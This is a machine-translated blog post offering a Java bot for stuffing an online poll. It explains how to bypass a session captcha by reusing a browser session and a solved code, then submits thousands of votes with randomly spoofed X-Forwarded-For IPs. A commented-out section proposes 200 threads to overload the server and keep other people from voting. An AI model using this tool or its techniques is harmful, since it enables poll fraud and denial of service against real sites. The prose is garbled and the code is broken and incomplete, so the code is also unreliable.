Java voting machine

Recommended for you: Get network issues from WhatsUp Gold. Not end users.

A lot of brush ticket, the server is down several times, then voting procedures to upgrade, increase the picture verification code function, there are 4 English digital combination verification code, then upgraded to Chinese verification code. JS voting last, write a bit random, this modified version of Java.

The first analysis of the verification code is supposed to work.

The first step, the request to the server, to generate codes server, session placement

Second, jump to the client (browser, this is generally) generated picture, in the picture is the content of session in the verification code

The third step, the user will verify post/get code data and the naked eye can see on the picture to the server

The fourth step, the server, verify the post/get code validation, and verification of session code is the same, the same will continue to execute business and then jumps to the voting page is the first step for the formation of new captcha; different jumps back to the client, tell the client: you made a mistake, then jump to the first step for the formation of new verification code


If the client is a browser, the code is the normal work of the. However, we are engaged in request program, after the execution of the fourth steps, not jump to the first step, the verification code will not work properly. If the program wrote: "rigorous, such as the check in step fourth verification code later, generate a new verification code in session", rather than let the client re launched by the first step of the request way to generate new verification code, the code can still work normally.


Only in the browser, go to step second, access to the verification code, and then use the procedure for the submission of data and verification code, can still

On the dry cargo, fuck goods


import java.util.Random;

import org.apache.commons.httpclient.HttpClient;
import org.apache.commons.httpclient.HttpException;
import org.apache.commons.httpclient.NameValuePair;
import org.apache.commons.httpclient.methods.PostMethod;

public class TP extends Thread {

	// Verification code
	protected static String AUTHNUM_SESSION = "To change the point of Education";

	// Access to information from the session in the browser, the server will think that the Java program submitted data, and just the browser with a session session
	protected static String SESSION_ID = "PHPSESSID=uouddcugmv4jnpep1sv3vlkr64";

	// Polling interval
	protected static long INTERVAL_TIME = 100;

	// Vote for ID
	protected static String ID = "77";

	// The total number of votes
	protected static int TP_MAX = 10000;

	// The vote.
	protected static String VOTE = ""
			+ ID;

	protected static int COUTER = 0;

	 * @param args
	 * @throws IOException
	 * @throws HttpException
	 * @throws InterruptedException
	public static void main(String[] args) throws HttpException, IOException,
			InterruptedException {
		TP tp = new TP();
		 * Application brush votes brush a while, found that the ID server is 77 of the vote, all don't count, even the normal votes are not counted, depressed ah
		 * Do not take such a play, others are in the brush a ticket, but I can't brush, no way, open 200 threads, another ID to others to vote, let the server busy, so can't brush ticket
		 * It's only fair, the server uninterrupted down, down
		// for(int i =0; i <200;i++){
		// TP tp = new TP();
		// tp.start();
		// }

	public void run() {
		int counter = 0;
		for (;;) {
			if (TP_MAX > 0 && counter >= TP_MAX) {
				System.out.println("To complete the total vote, vote: " + counter);
			try {
			} catch (InterruptedException e) {
			} catch (HttpException e) {
			} catch (UnsupportedEncodingException e) {
			} catch (IOException e) {

	protected static void vote() throws IOException, HttpException,
			UnsupportedEncodingException {
		HttpClient client = new HttpClient();

		PostMethod post = new PostMethod(VOTE);
		 * Attribute in requestHeader, are from the browser raking down
		post.addRequestHeader("Accept-Charset", "GBK,utf-8;q=0.7,*;q=0.3");
		post.addRequestHeader("Accept-Encoding", "GBK,utf-8;q=0.7,*;q=0.3");
		post.addRequestHeader("Accept-Language", "zh-CN,zh;q=0.8");
		post.addRequestHeader("Cache-Control", "max-age=0");
		post.addRequestHeader("Connection", "keep-alive");
		post.addRequestHeader("Host", "");
		post.addRequestHeader("Cookie", SESSION_ID);

		String fakeIp = rndIp();
		// Properties of the forged IP required
		post.addRequestHeader("X-Forwarded-For", fakeIp);
		post.addRequestHeader("Referer", "");
						"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7");

		NameValuePair[] nvp = new NameValuePair[3];
		// UTF-8 code verification code
		String code = URLEncoder.encode(AUTHNUM_SESSION, "utf-8");
		nvp[0] = new NameValuePair("code", code);
		nvp[1] = new NameValuePair("imgbtn.x", "33");
		nvp[2] = new NameValuePair("imgbtn.y", "16");


		// Submit data using POST method
		int statusCode = client.executeMethod(post);
		System.out.println("statusCode : " + statusCode);

		if (statusCode == 200) {
			if (post.getResponseBody() != null) {
				String response1String = new String(post.getResponseBody(),
				System.out.println("Vote:" + COUTER++);


	 * Forged IP
	 * @return
	private static String rndIp() {
		return rndInt(255) + "." + rndInt(255) + "." + rndInt(255) + "."
				+ rndInt(255);

	private static int rndInt(int max) {
		Random rnd = new Random();
		return rnd.nextInt(max);



The server code vulnerabilities not to fill a day, they can continue to brush ticket, go up. Procedures used in the commons-httpclient package

Recommended from our users: Dynamic Network Monitoring from WhatsUp Gold from IPSwitch. Free Download

Posted by Werner at December 13, 2013 - 2:49 PM